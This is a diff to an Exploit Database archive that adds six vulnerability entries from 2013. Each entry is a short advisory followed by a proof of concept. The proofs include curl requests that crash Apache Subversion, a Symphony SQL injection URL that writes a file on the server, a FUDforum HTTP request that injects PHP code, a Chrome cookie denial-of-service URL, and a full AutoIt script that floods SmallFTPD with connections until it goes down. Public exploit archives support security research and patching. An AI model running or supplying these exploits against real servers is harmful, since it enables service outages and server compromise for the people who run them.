DB: 2015-10-09

6 new exploits

files.csv

@@ -34699,3 +34699,9 @@ id,file,description,date,author,platform,type,port
 38414,platforms/php/webapps/38414.txt,"WordPress Feedweb Plugin 'wp_post_id' Parameter Cross Site Scripting Vulnerability",2013-03-30,"Stefan Schurtz",php,webapps,0
 38415,platforms/asp/webapps/38415.txt,"C2 WebResource 'File' Parameter Cross Site Scripting Vulnerability",2013-04-03,anonymous,asp,webapps,0
 38416,platforms/php/webapps/38416.txt,"e107 'content_preset.php' Cross Site Scripting Vulnerability",2013-04-03,"Simon Bieber",php,webapps,0
+38417,platforms/php/webapps/38417.txt,"Symphony 'sort' Parameter SQL Injection Vulnerability",2013-04-03,"High-Tech Bridge",php,webapps,0
+38418,platforms/php/webapps/38418.txt,"FUDforum Multiple Remote PHP Code Injection Vulnerabilities",2013-04-03,"High-Tech Bridge",php,webapps,0
+38419,platforms/windows/dos/38419.txt,"SmallFTPD Unspecified Denial of Service Vulnerability",2013-04-03,AkaStep,windows,dos,0
+38420,platforms/multiple/dos/38420.txt,"Google Chrome Cookie Verification Denial of Service Vulnerability",2013-04-04,anonymous,multiple,dos,0
+38421,platforms/linux/dos/38421.txt,"Apache Subversion 1.6.x 'mod_dav_svn/lock.c' Remote Denial of Service Vulnerability",2013-04-05,anonymous,linux,dos,0
+38422,platforms/linux/dos/38422.txt,"Apache Subversion Remote Denial of Service Vulnerability",2013-04-05,"Greg McMullin",linux,dos,0

platforms/linux/dos/38421.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/58897/info
+
+Apache Subversion is prone to a remote denial-of-service vulnerability.
+
+Attackers can exploit this issue to crash the application, resulting in denial-of-service conditions.
+
+Apache Subversion versions 1.6.0 through 1.6.20 and 1.7.0 through 1.7.8 are vulnerable. 
+
+curl -X LOCK --data-binary @lock_body 'http://www.example.com/repo/foo' 

platforms/linux/dos/38422.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/58898/info
+
+Apache Subversion is prone to a remote denial-of-service vulnerability.
+
+Attackers can exploit this issue to crash the application, resulting in denial-of-service conditions.
+
+Apache Subversion versions 1.7.0 through 1.7.8 are vulnerable. 
+
+curl -X REPORT --data-binary @log_report 'http://www.example.com/repo/!svn/bc/1/' 

platforms/multiple/dos/38420.txt

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/58857/info
+
+Google Chrome is prone to a denial-of-service vulnerability because it fails to verify the user supplied input.
+
+Successfully exploiting this issue will allow an attacker to inject special characters into the browser's local cookie storage, resulting in the requested website always responding with an error message which is hosted on specific web server software (like lighttpd). This will cause a denial-of-service condition.
+
+Chromium 25.0.1364.160 is vulnerable; other versions may also be affected.
+
+Note: The content related to Mozilla Firefox Browser has been moved to BID 62969 (Mozilla Firefox Browser Cookie Verification Denial of Service Vulnerability) for better documentation. 
+
+http://www.example.com/?utm_source=test&utm_medium=test&utm_campaign=te%05st 

platforms/php/webapps/38417.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/58843/info
+
+Symphony is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Symphony 2.3.1 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/symphony/system/authors/?order=asc&sort=id%20INTO%20OUTFILE%20%27/var/www/file.txt%27%20--%20 

platforms/php/webapps/38418.txt

@@ -0,0 +1,16 @@
+source: http://www.securityfocus.com/bid/58845/info
+
+FUDforum is prone to multiple vulnerabilities that attackers can leverage to execute arbitrary PHP code because the application fails to adequately sanitize user-supplied input.
+
+Attackers may exploit these issues to execute arbitrary PHP code within the context of the affected application. Successful attacks can compromise the affected application and possibly the underlying computer.
+
+FUDforum 3.0.4 is vulnerable; other versions may also be affected. 
+
+POST /adm/admreplace.php HTTP/1.1
+Host: fudforum
+Referer: http://www.example.com/fudforum/adm/admreplace.php?&SQ=8928823a5edf50cc642792c2fa4d8863
+Cookie: fud_session_1361275607=11703687e05757acb08bb3891f5b2f8d
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 111
+SQ=8928823a5edf50cc642792c2fa4d8863&rpl_replace_opt=0&btn_submit=Add&btn_regex=1&edit=&regex_ str=(.*)&regex_str_opt=e&regex_with=phpinfo() 

platforms/windows/dos/38419.txt

@@ -0,0 +1,80 @@
+source: http://www.securityfocus.com/bid/58856/info
+
+SmallFTPD is prone to an unspecified denial-of-service vulnerability.
+
+A remote attacker can exploit this issue to crash the application resulting, in denial-of-service conditions.
+
+SmallFTPD 1.0.3 is vulnerable; other versions may also be affected. 
+
+#ce
+#include <String.au3>
+$f=_StringRepeat('#',10);
+$USE_PROTO='ftp://';
+$INVALIDIP='INVALID IP FORMAT';
+$INVALIDPORT='INVALID PORT NUMBER!';
+$HTTPUA='Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SV1; .NET CLR 1.1.4325)';
+$msg_usage=$f & ' smallftpd 1.0.3 DENIAL OF SERVICE exploit ' & StringMid($f,1,7) & @CRLF & _
+$f & " Usage: " & _
+@ScriptName & ' REMOTEIP ' & ' REMOTEPORT ' & $f & @CRLF & _
+StringReplace($f,'#','\') & _StringRepeat(' ',10) & _
+'HACKING IS LIFESTYLE!' & _StringRepeat(' ',10) & StringReplace($f,'#','/')
+if $CmdLine[0]=0 Then
+MsgBox(64,"","This is a console Application!" & @CRLF & 'More Info: ' & @ScriptName & ' --help' & @CRLF & _
+'Invoke It from MSDOS!',5)
+exit;
+EndIf
+if $CmdLine[0] <> 2 Then
+ConsoleWrite(@CRLF & _StringRepeat('#',62) & @CRLF & $msg_usage & @CRLF & _StringRepeat('#',62) & @CRLF);
+exit;
+EndIf
+$ip=StringMid($CmdLine[1],1,15);//255.255.255.255
+$port=StringMid($CmdLine[2],1,5);//65535
+validateall($ip,$port)
+func validateall($ip,$port)
+if not StringIsDigit($port) Or NOT (Number($port)<=65535) Then
+ConsoleWrite($INVALIDPORT);
+Exit;
+EndIf
+TCPStartup();
+$ip=TCPNameToIP($ip);
+TCPShutdown();
+$z=StringSplit($ip,Chr(46));//Asc('.')
+if @error then
+ConsoleWrite($INVALIDIP);
+exit;
+EndIf
+for $x=0 to $z[0]
+if Number($z[0]-1) <>3 Then
+ConsoleWrite($INVALIDIP);
+Exit
+EndIf
+if $x>=1 AND Not StringIsDigit($z[$x]) Or StringLen($z[$x])>3 Then
+ConsoleWrite($INVALIDIP);
+exit;
+EndIf
+Next
+$x=0;
+ConsoleWrite(@CRLF & _StringRepeat('#',62) & @CRLF & $msg_usage & @CRLF & _StringRepeat('#',62) & @CRLF);
+ConsoleWrite(@CRLF & $f & _StringRepeat('#',6) & ' WORKING ON IT! PLEASE WAIT...' & _StringRepeat('#',6) & $f & @CRLF)
+downit($ip,$port,$x)
+EndFunc; =>validateall($ip,$port)
+Func downit($ip,$port,$x)
+$x+=1;
+TCPStartup()
+$socket_con = -1
+$socket_con = TCPConnect($ip, $port)
+If not @error Then
+if Mod($x,40)=0 Then
+ConsoleWrite(_StringRepeat('-',62) & @CRLF & '~ TRY count: ~ ' & $x & @CRLF & _StringRepeat('-',62) & @CRLF)
+Sleep(Random(1000,1800,1));
+EndIf
+downit($ip,$port,$x)
+Else
+Beep(1000,1500)
+ConsoleWrite(_StringRepeat('#',62) & @CRLF & $f & _StringRepeat(' ',12) & 'Mission Completed! @' & $x & _StringRepeat(' ',12) & $f & @CRLF & _
+_StringRepeat(' ',5) & ' TARGET =>' & StringLower($USE_PROTO & $ip & ':' & $port) & '/ is * DOWN ! * ' & @CRLF & _StringRepeat('#',62));
+TCPShutdown();
+exit;
+EndIf
+EndFunc; ==>downit($ip,$port,$x)
+#cs